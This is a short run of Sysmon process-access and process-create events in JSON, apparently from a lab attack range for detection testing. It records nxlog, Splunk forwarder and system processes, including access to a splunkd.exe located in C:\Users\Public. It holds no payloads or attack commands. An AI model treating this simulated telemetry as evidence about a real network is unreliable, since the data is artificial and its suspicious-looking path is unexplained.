{"EventTime":"2020-08-01 06:50:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2910,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:29.255\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:29.255","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2911,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:29.569\r\nProcessGuid: {E2A3D6B1-10B5-5F25-0000-0010E5F70400}\r\nProcessId: 4692\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:50:29.569","ProcessGuid":"{E2A3D6B1-10B5-5F25-0000-0010E5F70400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2912,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:29.568\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10B5-5F25-0000-0010E5F70400}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:29.568","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10B5-5F25-0000-0010E5F70400}","TargetProcessId":"4692","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2913,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:29.568\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10B5-5F25-0000-0010E5F70400}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:29.568","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10B5-5F25-0000-0010E5F70400}","TargetProcessId":"4692","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2914,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:29.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:29.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2915,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:29.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:29.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2916,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:29.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:29.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2917,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:29.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:29.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
